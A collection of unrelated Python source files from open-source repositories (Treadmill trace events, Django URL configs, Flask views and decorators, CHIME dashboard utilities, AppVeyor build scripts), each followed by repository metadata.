source=source,
instanceid=instanceid,
payload=payload
)
self.uniqueid = uniqueid
self.service = service
@classmethod
def from_data(cls, timestamp, source, instanceid, event_type, event_data,
payload=None):
assert cls == getattr(AppTraceEventTypes, event_type).value
parts = event_data.split('.')
uniqueid = parts.pop(0)
service = '.'.join(parts)
return cls(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload,
uniqueid=uniqueid,
service=service
)
@property
def event_data(self):
return '{uniqueid}.{service}'.format(
uniqueid=self.uniqueid,
service=self.service
)
class ServiceExitedTraceEvent(AppTraceEvent):
"""Event emitted when a service of container instance exited.
"""
__slots__ = (
'uniqueid',
'service',
'rc',
'signal',
)
def __init__(self, uniqueid, service, rc, signal,
timestamp=None, source=None, instanceid=None, payload=None):
super(ServiceExitedTraceEvent, self).__init__(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload
)
self.uniqueid = uniqueid
self.service = service
self.rc = int(rc)
self.signal = int(signal)
@classmethod
def from_data(cls, timestamp, source, instanceid, event_type, event_data,
payload=None):
assert cls == getattr(AppTraceEventTypes, event_type).value
parts = event_data.split('.')
uniqueid = parts.pop(0)
signal = parts.pop()
rc = parts.pop()
service = '.'.join(parts)
return cls(
timestamp=timestamp,
source=source,
instanceid=instanceid,
payload=payload,
uniqueid=uniqueid,
service=service,
rc=rc,
signal=signal
)
@property
def event_data(self):
return '{uniqueid}.{service}.{rc}.{signal}'.format(
uniqueid=self.uniqueid,
service=self.service,
rc=self.rc,
signal=self.signal
)
class AppTraceEventTypes(enum.Enum):
"""Enumeration of all app event type names.
"""
aborted = AbortedTraceEvent
configured = ConfiguredTraceEvent
deleted = DeletedTraceEvent
finished = FinishedTraceEvent
killed = KilledTraceEvent
pending = PendingTraceEvent
pending_delete = PendingDeleteTraceEvent
scheduled = ScheduledTraceEvent
service_exited = ServiceExitedTraceEvent
service_running = ServiceRunningTraceEvent
class AppTraceEventHandler(_events.TraceEventHandler):
"""Base class for processing app trace events.
"""
DISPATCH = {
ScheduledTraceEvent:
lambda self, event: self.on_scheduled(
when=event.timestamp,
instanceid=event.instanceid,
server=event.where,
why=event.why
),
PendingTraceEvent:
lambda self, event: self.on_pending(
when=event.timestamp,
instanceid=event.instanceid,
why=event.why
),
PendingDeleteTraceEvent:
lambda self, event: self.on_pending_delete(
when=event.timestamp,
instanceid=event.instanceid,
why=event.why
),
DeletedTraceEvent:
lambda self, event: self.on_deleted(
when=event.timestamp,
instanceid=event.instanceid
),
ConfiguredTraceEvent:
lambda self, event: self.on_configured(
when=event.timestamp,
instanceid=event.instanceid,
server=event.source,
uniqueid=event.uniqueid
),
FinishedTraceEvent:
lambda self, event: self.on_finished(
when=event.timestamp,
instanceid=event.instanceid,
server=event.source,
exitcode=event.rc,
signal=event.signal
),
AbortedTraceEvent:
lambda self, event: self.on_aborted(
when=event.timestamp,
instanceid=event.instanceid,
server=event.source,
why=event.why
),
KilledTraceEvent:
lambda self, event: self.on_killed(
when=event.timestamp,
instanceid=event.instanceid,
server=event.source,
is_oom=event.is_oom
),
ServiceRunningTraceEvent:
lambda self, event: self.on_service_running(
when=event.timestamp,
instanceid=event.instanceid,
server=event.source,
uniqueid=event.uniqueid,
service=event.service
),
ServiceExitedTraceEvent:
lambda self, event: self.on_service_exited(
when=event.timestamp,
instanceid=event.instanceid,
server=event.source,
uniqueid=event.uniqueid,
service=event.service,
exitcode=event.rc,
signal=event.signal
),
}
def dispatch(self, event):
"""Dispatch event to one of the handler methods.
"""
return self.DISPATCH.get(type(event), None)
@abc.abstractmethod
def on_scheduled(self, when, instanceid, server, why):
"""Invoked when task is scheduled.
"""
@abc.abstractmethod
def on_pending(self, when, instanceid, why):
"""Invoked when task is pending.
"""
@abc.abstractmethod
def on_pending_delete(self, when, instanceid, why):
"""Invoked when task is about to be deleted.
"""
@abc.abstractmethod
def on_configured(self, when, instanceid, server, uniqueid):
"""Invoked when task is configured.
"""
@abc.abstractmethod
def on_deleted(self, when, instanceid):
"""Invoked when task is deleted.
"""
@abc.abstractmethod
def on_finished(self, when, instanceid, server, signal, exitcode):
"""Invoked when task is finished.
"""
@abc.abstractmethod
def on_aborted(self, when, instanceid, server, why):
"""Invoked when task is aborted.
"""
@abc.abstractmethod
def on_killed(self, when, instanceid, server, is_oom):
"""Default task-finished handler.
"""
@abc.abstractmethod
def on_service_running(self, when, instanceid, server, uniqueid, service):
"""Invoked when service is running.
"""
@abc.abstractmethod
def on_service_exited(self, when, instanceid, server, uniqueid, service,
exitcode, signal):
"""Invoked when service exits.
"""
| {
"repo_name": "Morgan-Stanley/treadmill",
"path": "lib/python/treadmill/trace/app/events.py",
"copies": "2",
"size": "18675",
"license": "apache-2.0",
"hash": 5909132291452893000,
"line_mean": 26.9565868263,
"line_max": 79,
"alpha_frac": 0.5544846051,
"autogenerated": false,
"ratio": 4.468772433596555,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.6023257038696554,
"avg_score": null,
"num_lines": null
} |
"""app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from rest_framework import routers
from qs import views
router = routers.DefaultRouter()
router.register(r'users', views.UserViewSet)
router.register(r'groups', views.GroupViewSet)
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
]
| {
"repo_name": "marcopuccio/pocs",
"path": "python/drf-gs/app/app/urls.py",
"copies": "1",
"size": "1073",
"license": "mit",
"hash": -2749578524721797600,
"line_mean": 33.6129032258,
"line_max": 82,
"alpha_frac": 0.7110904007,
"autogenerated": false,
"ratio": 3.5296052631578947,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47406956638578945,
"avg_score": null,
"num_lines": null
} |
"""app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from api import views
from rest_framework import routers
router = routers.DefaultRouter()
# router.register(r'users', views.UserViewSet)
# router.register(r'groups', views.GroupViewSet)
router.register(r'locales', views.LocalViewSet)
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
]
| {
"repo_name": "Hackatong2017Geriatricos/backend",
"path": "app/urls.py",
"copies": "1",
"size": "1127",
"license": "apache-2.0",
"hash": -7068995877040204000,
"line_mean": 33.1515151515,
"line_max": 82,
"alpha_frac": 0.7125110914,
"autogenerated": false,
"ratio": 3.521875,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9581045456131654,
"avg_score": 0.03066812705366922,
"num_lines": 33
} |
"""app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.contrib.staticfiles import views
from django.conf import settings
from .views import index
from .views import user
from .views import u
from .views import root
from .views import activity
from .views import scenery
from .views import strategy
from .views import siderbar
from .views import test
urlpatterns = [
url(r'^$', index.index, name="index"),
url(r'^activity/$', activity.getAllActivities, name="all-activities"),
url(r'^activity/add/$', activity.addActivity, name="addActivity"),
url(r'^activity/(?P<activity_id>[0-9]+)/$', activity.getActivityInfo, name="activity-info"),
url(r'^activity/join/$', activity.joinActivity, name="activity-join"),
url(r'^activity/s/$', activity.searchActivity, name="activity-search"),
url(r'^scenery/$', scenery.getAllScenery, name="all-scenery"),
url(r'^scenery/(?P<scenery_id>[0-9]+)/$', scenery.getSceneryInfo, name="scenery-info"),
url(r'^scenery/search/(?P<fuzzyQueryWord>\w+)/$', scenery.getFuzzySearchScenerys, name="getFuzzySearchScenerys"),
url(r'^scenery/s/$', scenery.searchScenery, name="scenery-search"),
url(r'^strategy/$', strategy.getAllStrategy, name="all-strategy"),
url(r'^strategy/(?P<strategy_id>[0-9]+)/$', strategy.getOneStrategy, name="one-strategy"),
url(r'^reg/$', user.register, name="register"),
url(r'^login/$', user.login, name="login"),
url(r'^logout/$', user.logout, name="logout"),
url(r'^u/reset-password/$', u.resetPassword, name="reset-password"),
url(r'^u/update/$', u.updateProfile, name="update profile"),
url(r'^u/post/$', u.postStrategy, name="post journal"),
url(r'^u/slmanage/$', root.getslider, name="getslider"),
url(r'^u/slmanage/add/$', root.addslider, name="addslider"),
#url(r'^u/slmanage/update/$', root.updateslider, name="updateslider"),
url(r'^u/slmanage/delete/$', root.deleteslider, name="deleteslider"),
url(r'^u/acmanage/$', root.getactivity, name="getactivity"),
url(r'^u/scmanage/$', root.getscenery, name="getscenery"),
url(r'^u/jomanage/$', root.getstrategy, name="getjournal"),
url(r'^u/usmanage/$', root.getuser, name="getuser"),
# url(r'^u/(?P<username>\w+)/$', u.getUserProfile, name="user-profile"),
url(r'^u/$', u.getProfile, name="get profile"),
url(r'^u/activity/$', u.getPersonActivities),
url(r'^u/post/list/$', strategy.getPostedStrategy, name="get all strategy"),
url(r'^siderbar/activity/$', siderbar.activity),
url(r'^siderbar/popular/activity/$', siderbar.popular_activity),
url(r'^siderbar/popular/scenery/$', siderbar.popular_scenery),
url(r'^siderbar/popular/strategy/$', siderbar.popular_strategy),
url(r'^test/', test.test, name="test")
]
urlpatterns += [
url(r'^static/(?P<path>.*)$', views.static.serve, {'document_root': settings.STATIC_ROOT}, name="static"),
url(r'^media/(?P<path>.*)$', views.static.serve, {'document_root': settings.MEDIA_ROOT}, name="media")
]
| {
"repo_name": "October-66/Traveler-Pal",
"path": "traveler_pal/app/urls.py",
"copies": "1",
"size": "3651",
"license": "mit",
"hash": -3892179055834035000,
"line_mean": 41.9529411765,
"line_max": 117,
"alpha_frac": 0.6778964667,
"autogenerated": false,
"ratio": 3.2598214285714286,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4437717895271429,
"avg_score": null,
"num_lines": null
} |
"""app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf import settings
from django.conf.urls import url, include, patterns
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic.base import TemplateView
from rest_framework import routers
from backend import views
router = routers.DefaultRouter()
router.register(r'users', views.UserViewSet)
router.register(r'tags', views.TagViewSet)
router.register(r'entries', views.EntryViewSet)
router.register(r'favorites', views.FavoriteViewSet)
router.register(r'settings', views.SettingViewSet)
urlpatterns = [
url(r'^$', TemplateView.as_view(template_name='home.html'), name='home'),
url(r'^web/$', TemplateView.as_view(template_name=settings.WEB_ROOT+'/index.html')),
url(r'^sign-up/', views.sign_up, name="sign-up"),
url(r'^qq-login', views.qq_login, name="qq-login"),
url(r'^admin/', admin.site.urls),
url(r'^api/', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
url(r'^api-token-auth/', 'rest_framework_jwt.views.obtain_jwt_token'),
url(r'^api-token-refresh/', 'rest_framework_jwt.views.refresh_jwt_token'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT
) + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT
) + static(settings.WEB_URL, document_root=settings.WEB_ROOT)
| {
"repo_name": "tonnie17/Bookmarker",
"path": "bookmarker/bookmarker/urls.py",
"copies": "1",
"size": "1989",
"license": "mit",
"hash": 8771301216892135000,
"line_mean": 44.2045454545,
"line_max": 88,
"alpha_frac": 0.7239819005,
"autogenerated": false,
"ratio": 3.3769100169779285,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9594733380846867,
"avg_score": 0.001231707326212149,
"num_lines": 44
} |
"""app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.urls import path
from . import views
app_name = 'app'
urlpatterns = [
# Home:
path('', views.home, name='home'),
# Add:
path('add/', views.add_memo, name='add_memo'),
# Edit:
path('edit/<int:id>/', views.edit_memo, name='edit_memo'),
# Delete:
path('delete/<int:id>/', views.delete_memo, name='delete_memo'),
# Refresh:
path('refresh/', views.refresh_memo, name='refresh_memo'),
]
| {
"repo_name": "y-tsutsu/mondja",
"path": "app/urls.py",
"copies": "1",
"size": "1066",
"license": "bsd-3-clause",
"hash": 704016649391363000,
"line_mean": 28.6111111111,
"line_max": 77,
"alpha_frac": 0.6547842402,
"autogenerated": false,
"ratio": 3.4498381877022655,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9604622427902265,
"avg_score": 0,
"num_lines": 36
} |
"""app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from baton.autodiscover import admin
from django.urls import path, include, re_path
from django.conf import settings
from django.views import static
from django.contrib.staticfiles.views import serve
from app.views import admin_search
from news.views import news_change_view
urlpatterns = [
path('admin/doc/', include('django.contrib.admindocs.urls')),
path('admin/search/', admin_search),
# path('admin/newschange/<int:id>', news_change_view),
path('admin/', admin.site.urls),
path('baton/', include('baton.urls')),
path('tinymce/', include('tinymce.urls')),
]
if settings.DEBUG:
urlpatterns += [
re_path(r'^media/(?P<path>.*)$', static.serve,
{'document_root': settings.MEDIA_ROOT}),
]
urlpatterns += [
re_path(r'^static/(?P<path>.*)$', serve),
]
| {
"repo_name": "otto-torino/django-baton",
"path": "testapp/app/app/urls.py",
"copies": "1",
"size": "1450",
"license": "mit",
"hash": 6651242364689964000,
"line_mean": 35.25,
"line_max": 77,
"alpha_frac": 0.6772413793,
"autogenerated": false,
"ratio": 3.6340852130325816,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.48113265923325815,
"avg_score": null,
"num_lines": null
} |
#app/urls.py
from django.conf.urls import url
from django.conf.urls import patterns, include
from . import views
from app import views
from django.conf.urls import url, patterns, include
#from app.api import UsuarioResource
#usuario_resource=UsuarioResource()
#from .views import RegistrarUsuario, RedirigirUsuario
urlpatterns = [
#url(r'^admin', views.libros, name='libros'),
url(r'^$', views.index, name='index'),
url(r'^app/$', views.index, name='base'),
url(r'^index/$', views.index, name='index'),
url(r'^about/$',views.about,name='about'),
url(r'^login/$',views.login,name='login'),
url(r'^registro/$',views.registro,name='registro'),
url(r'^logout/$',views.logout,name='logout'),
url(r'^addbar/$',views.addbar,name='addbar'),
url(r'^bar/(?P<category_name_slug>[\w\-]+)/$',views.bar,name='bar'),
url(r'^bar/(?P<bar_name_url>[\w\-]+)/add_tapa/$', views.add_tapa, name='add_tapa'),
url(r'^reclama_bares/$',views.reclama_bares,name='reclama_bares'),
url(r'^reclama_visitas/$',views.reclama_visitas,name='reclama_visitas')
] | {
"repo_name": "bogdananas/proyectoIV-modulo2",
"path": "app/urls.py",
"copies": "1",
"size": "1085",
"license": "mit",
"hash": -4481251202425780000,
"line_mean": 34.0322580645,
"line_max": 87,
"alpha_frac": 0.666359447,
"autogenerated": false,
"ratio": 2.9324324324324325,
"config_test": false,
"has_no_keywords": true,
"few_assignments": false,
"quality_score": 0.40987918794324324,
"avg_score": null,
"num_lines": null
} |
# app/users/views.py
#################### Imports ####################
from flask import render_template, Blueprint, request, redirect, url_for, flash
from sqlalchemy.exc import IntegrityError
from .forms import RegisterForm
from app import db
from app.models import User
#################### Config ####################
users_blueprint = Blueprint('users', __name__, template_folder='templates')
#################### Routes ####################
@users_blueprint.route('/login')
def login():
return render_template('login.html')
@users_blueprint.route('/register', methods=['GET', 'POST'])
def register():
form = RegisterForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
try:
new_user = User(form.username.data, form.first_name.data, form.last_name.data, form.email.data, form.password.data)
new_user.authenticated = True
db.session.add(new_user)
db.session.commit()
flash('Thank you for registering!', 'success')
return redirect(url_for('blog.index'))
except IntegrityError:
db.session.rollback()
flash('ERROR! Email ({}) already exists.'.format(form.email.data), 'error')
return render_template('register.html', form=form)
| {
"repo_name": "weldon0405/weldon-blog",
"path": "app/users/views.py",
"copies": "1",
"size": "1340",
"license": "mit",
"hash": 1541331423795959000,
"line_mean": 32.5,
"line_max": 131,
"alpha_frac": 0.5805970149,
"autogenerated": false,
"ratio": 4.2271293375394325,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0036591571378762093,
"num_lines": 40
} |
"""app/utils
utils
The helper classes and functions here exist to reduce large repetitive code
blocks throughout the project. They may contain functions or classes from
module but do not change the parameters of the class
Modules
-------
templates utilities for localization templates
"""
from itertools import repeat
from json import dumps, loads
from collections import Mapping
from datetime import date, datetime
from typing import Any, List
from urllib.parse import quote
from dateutil.parser import parse as parse_date
from pandas import DataFrame
from chime_dash.app.services.plotting import plot_dataframe
from chime_dash.app.utils.templates import df_to_html_table
from penn_chime.model.parameters import Parameters, Disposition
from penn_chime.constants import DATE_FORMAT
from penn_chime.view.charts import build_table
class ReadOnlyDict(Mapping):
def __init__(self, data):
self._data = data
def __getitem__(self, key):
return self._data[key]
def __len__(self):
return len(self._data)
def __iter__(self):
return iter(self._data)
def keys(self):
return self._data.keys()
def _parameters_serializer_helper(obj):
if isinstance(obj, (datetime, date)):
result = obj.isoformat()
else:
result = obj.__dict__
return result
# todo handle versioning? we don"t currently persist Dash state, but we may. ¯\_(ツ)_/¯
def parameters_serializer(p: Parameters):
return dumps(p, default=_parameters_serializer_helper, sort_keys=True)
def parameters_deserializer(p_json: str):
values = loads(p_json)
dates = {
key: parse_date(values[key]).date() if values[key] else None
for key in (
"current_date",
"date_first_hospitalized",
"mitigation_date",
)
}
return Parameters(
current_date=dates["current_date"],
current_hospitalized=values["current_hospitalized"],
hospitalized=Disposition.create(
days=values["hospitalized"][0],
rate=values["hospitalized"][1],
),
icu=Disposition.create(
days=values["icu"][0],
rate=values["icu"][1],
),
infectious_days=values["infectious_days"],
date_first_hospitalized=dates["date_first_hospitalized"],
doubling_time=values["doubling_time"],
market_share=values["market_share"],
mitigation_date=dates["mitigation_date"],
n_days=values["n_days"],
population=values["population"],
recovered=values["recovered"],
region=values["region"],
relative_contact_rate=values["relative_contact_rate"],
ventilated=Disposition.create(
days=values["ventilated"][0],
rate=values["ventilated"][1],
),
)
def build_csv_download(df):
return "data:text/csv;charset=utf-8,{csv}".format(
csv=quote(df.to_csv(index=True, encoding="utf-8"))
)
def get_n_switch_values(input_value, elements_to_update) -> List[bool]:
result = []
for _ in repeat(None, elements_to_update):
result.append(input_value)
return result
def prepare_visualization_group(df: DataFrame = None, **kwargs) -> List[Any]:
"""Creates plot, table and download link for data frame.
Arguments:
df: The Dataframe to plot
content: Dict[str, str]
Mapping for translating columns and index.
labels: List[str]
Columns to display
table_mod: int
Displays only each `table_mod` row in table
"""
result = [{}, None, None]
if df is not None and isinstance(df, DataFrame):
date_column = "date"
day_column = "day"
# Translate column and index if specified
content = kwargs.get("content", None)
if content:
columns = {col: content[col] for col in df.columns if col in content}
index = (
{df.index.name: content[df.index.name]}
if df.index.name and df.index.name in content
else None
)
df = df.rename(columns=columns, index=index)
date_column = content.get(date_column, date_column)
day_column = content.get(day_column, day_column)
plot_data = plot_dataframe(
df.dropna().set_index(date_column).drop(columns=[day_column])
)
# translate back for backwards compability of build_table
column_map = {day_column: "day", date_column: "date"}
table = (
df_to_html_table(
build_table(
df=df.rename(columns=column_map),
labels=kwargs.get("labels", df.columns),
modulo=kwargs.get("table_mod", 7),
),
formats={
float: int,
(date, datetime): lambda d: d.strftime(DATE_FORMAT),
},
)
# if kwargs.get("show_tables", None)
# else None
)
# Convert columnnames to lowercase
column_map = {col: col.lower() for col in df.columns}
csv = build_csv_download(df.rename(columns=column_map))
result = [plot_data, table, csv]
return result
def singleton(class_):
instances = {}
def get_instance(*args, **kwargs):
if class_ not in instances:
instances[class_] = class_(*args, **kwargs)
return instances[class_]
return get_instance
| {
"repo_name": "CodeForPhilly/chime",
"path": "src/chime_dash/app/utils/__init__.py",
"copies": "1",
"size": "5511",
"license": "mit",
"hash": 8063376096094657000,
"line_mean": 29.4254143646,
"line_max": 86,
"alpha_frac": 0.6039585981,
"autogenerated": false,
"ratio": 3.94201861130995,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.504597720940995,
"avg_score": null,
"num_lines": null
} |
"""AppVeyor Build
This file is used to build and distribute the safety binary on appveyor. Take
a look at the corresponding appveyor.yml as well.
"""
import os
import subprocess
import sys
from collections import OrderedDict
class environment:
WIN = "win"
LINUX = "linux"
MACOS = "macos"
def __init__(self):
os_mapping = {
"Visual Studio 2019": self.WIN,
"Ubuntu": self.LINUX,
"macOS": self.MACOS
}
self.os = os_mapping[os.getenv("APPVEYOR_BUILD_WORKER_IMAGE")]
@property
def python(self):
for arch, python in self.PYTHON_BINARIES[self.os].items():
yield arch, python
PYTHON_BINARIES = {
WIN: {
64: "C:\\Python38-x64\\python.exe",
32: "C:\\Python38\\python.exe",
},
# Order is important. If the 32 bit release gets built first,
# you'll run into permission problems due to docker clobbering
# up the current working directory.
LINUX: OrderedDict([
(64, "python"),
(32, f"docker run -t -v {os.getcwd()}:/app 32-bit-linux python3"),
]),
MACOS: {
# Trying to use Python 3 compatible with PyInstaller according
# https://www.appveyor.com/docs/macos-images-software/#python
64: "~/venv3.8/bin/python",
}
}
def run(self, command):
"""Runs the given command via subprocess.check_output.
Exits with -1 if the command wasn't successfull.
"""
try:
print(f"RUNNING: {command}")
print("-" * 80)
print(subprocess.check_output(command, shell=True).decode('utf-8'))
except subprocess.CalledProcessError as e:
print(f"ERROR calling '{command}'")
print("-" * 20)
print(e.output and e.output.decode('utf-8'))
sys.exit(-1)
def install(self):
"""
Install required dependencies
"""
# special case:
# - build the 32 bit binary for linux on docker
# - create dist/ path to circumvent permission errors
if self.os == self.LINUX:
self.run("docker build -t 32-bit-linux -f Dockerfilei386 .")
for arch, python in self.python:
self.run(f"{python} -m pip install setuptools")
self.run(f"{python} -m pip install pyinstaller")
self.run(f"{python} -m pip install pytest")
self.run(f"{python} -m pip install -e .")
def dist(self):
"""Runs Pyinstaller producing a binary for every platform arch."""
for arch, python in self.python:
# Build the binary
build_path = os.path.join("dist", f"safety-{arch}")
self.run(f"{python} -m PyInstaller safety.spec"
f" --distpath {build_path}")
# There seems to be no way to tell pyinstaller the binary name.
# This leads to problems with appveyors artifact collector because
# every binary is named the same.
#
# Move them around so they can be picked up correctly
#
artifact_path = os.path.join(
os.getcwd(),
"dist",
f"safety-{self.os}-{'i686' if arch == 32 else 'x86_64'}"
)
binary_path = os.path.join(os.getcwd(), build_path, "safety")
if self.os == self.WIN:
self.run(f"move {binary_path}.exe {artifact_path}.exe")
else:
self.run(f"cp {binary_path} {artifact_path}")
def test(self):
"""
Runs tests for every available arch on the current platform.
"""
for arch, python in self.python:
self.run(f"{python} -m pytest")
if __name__ == "__main__":
if len(sys.argv) <= 1 or sys.argv[1] not in ['install', 'test', 'dist']:
print("usage: appveyor.py [install|test|dist]")
sys.exit(-1)
env = environment()
# Runs the command in sys.argv[1] (install|test|dist)
getattr(env, sys.argv[1])()
sys.exit(0)
| {
"repo_name": "pyupio/safety",
"path": "appveyor.py",
"copies": "1",
"size": "4119",
"license": "mit",
"hash": -3246465745565662000,
"line_mean": 30.9302325581,
"line_max": 79,
"alpha_frac": 0.5518329692,
"autogenerated": false,
"ratio": 3.9191246431969553,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9970957612396956,
"avg_score": 0,
"num_lines": 129
} |
from contextlib import closing
import os
import subprocess
import tempfile
import yaml
_POWERSHELL_ONLY_ERROR = ("""appveyor-container-runner only works with """
"""powershell commands.""")
def main():
"""Runs the appveyor.yml script."""
with open("appveyor.yml", "r") as yaml_file:
appveyor_yaml = yaml.load(yaml_file.read())
commands = list()
for section in ["install",
"before_build",
"after_build",
"before_test",
"test_script",
"after_test",
"on_finish"]:
try:
try:
section_list = appveyor_yaml[section]
except KeyError:
continue
commands += ([i["ps"] for i in section_list] or list())
except KeyError:
raise RuntimeError(_POWERSHELL_ONLY_ERROR)
script_file_name = os.path.join(os.getcwd(), "build-script.ps1")
with open(script_file_name, "wt") as script_file:
for command in commands:
script_file.write("{0}\n".format(command))
script_file.flush()
os.environ["APPVEYOR"] = "1"
return subprocess.check_call(["powershell",
"-ExecutionPolicy",
"Bypass",
os.path.basename(script_file.name)],
env=os.environ)
| {
"repo_name": "smspillaz/appveyor-container-runner",
"path": "appveyorcontainerrunner/runner.py",
"copies": "1",
"size": "1735",
"license": "mit",
"hash": -5167724052448867000,
"line_mean": 29.4385964912,
"line_max": 74,
"alpha_frac": 0.4933717579,
"autogenerated": false,
"ratio": 4.530026109660574,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5523397867560574,
"avg_score": null,
"num_lines": null
} |
"""App view decorators."""
from functools import wraps
from flask import (
abort,
request,
)
def require_headers(headers=[]):
"""Check for required headers in a view.
@require_headers(headers=['X-Foo'])
def view():
pass
"""
def outer(func, *args, **kwargs):
@wraps(func)
def inner(*args, **kwargs):
if headers:
s1, s2 = set(headers), set([h[0] for h in request.headers])
matches = s1.intersection(s2)
diff = s1.difference(s2)
if len(s1) != len(matches):
raise ValueError(
'Missing required header(s): {}'.format(list(diff)))
return func(*args, **kwargs)
return inner
return outer
def require_cookies(cookies=[]):
"""Check for required cookies in a view.
@require_cookies(cookies=['csrftoken', 'session'])
def view():
pass
"""
def outer(func, *args, **kwargs):
@wraps(func)
def inner(*args, **kwargs):
if cookies:
s1 = set(cookies)
s2 = set([k for k, v in request.cookies.items()])
matches = s1.intersection(s2)
diff = s1.difference(s2)
if len(s1) != len(matches):
raise ValueError(
'Missing required cookie(s): {}'.format(list(diff)))
return func(*args, **kwargs)
return inner
return outer
def require_args(params=[]):
"""Check for required args (and values) in a view.
@require_args(params=['paginate'])
def view():
pass
or, if you want to check both key and value:
@require_args(params={'paginate': True})
def view():
pass
"""
def outer(func, *args, **kwargs):
@wraps(func)
def inner(*args, **kwargs):
if params:
if isinstance(params, list):
s1 = set(params)
s2 = set([k for k, v in request.args.items()])
matches = s1.intersection(s2)
diff = s1.difference(s2)
if len(s1) != len(matches):
raise ValueError(
'Missing required arg(s): {}'.format(list(diff)))
else:
for param, val in params.items():
arg = request.args.get(param)
if arg is None:
raise ValueError(
'Missing param `{}`'.format(param))
if arg != val:
raise ValueError(
'Invalid value `{}` '
'for param {}.'.format(arg, param))
return func(*args, **kwargs)
return inner
return outer
def require_form(values=[]):
"""Check for required form values.
@require_form(values=['name', 'address'])
def view():
pass
"""
def outer(func, *args, **kwargs):
@wraps(func)
def inner(*args, **kwargs):
if request.method == 'POST':
if values:
s1 = set(values)
s2 = set([k for k, v in request.form.items()])
matches = s1.intersection(s2)
diff = s1.difference(s2)
if len(s1) != len(matches):
raise ValueError(
'Missing required form '
'field(s): {}'.format(list(diff)))
return func(*args, **kwargs)
return inner
return outer
def xhr_only(status_code=415):
"""Asssure request is XHR only.
@xhr_only()
def view():
pass
"""
def outer(func, *args, **kwargs):
@wraps(func)
def inner(*args, **kwargs):
if not request.is_xhr:
# Default to status "unsupported media type".
abort(status_code)
return func(*args, **kwargs)
return inner
return outer
| {
"repo_name": "christabor/jinja2_template_pack",
"path": "flask_extras/decorators.py",
"copies": "2",
"size": "4116",
"license": "mit",
"hash": -8965912037198929000,
"line_mean": 29.2647058824,
"line_max": 77,
"alpha_frac": 0.4679300292,
"autogenerated": false,
"ratio": 4.478781284004352,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 136
} |
# app/views/admin.py
